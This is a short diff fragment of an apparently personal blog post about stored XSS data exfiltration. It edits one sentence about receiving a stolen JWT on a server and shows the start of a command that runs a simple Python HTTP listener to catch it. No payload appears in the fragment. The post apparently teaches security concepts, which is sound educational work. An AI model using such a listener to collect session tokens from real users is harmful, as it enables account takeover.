andreathniah/bucketoftears/_posts/2023-03-17-stored-xss-data-exfiltration.md

 );
 ```

-... and voilà, the JWT we are looking for on our attack server!
+... voilà, the JWT we are looking for on our web server!

 ```bash
 bot@bucketoftears:~$ python3 -m http.server 8000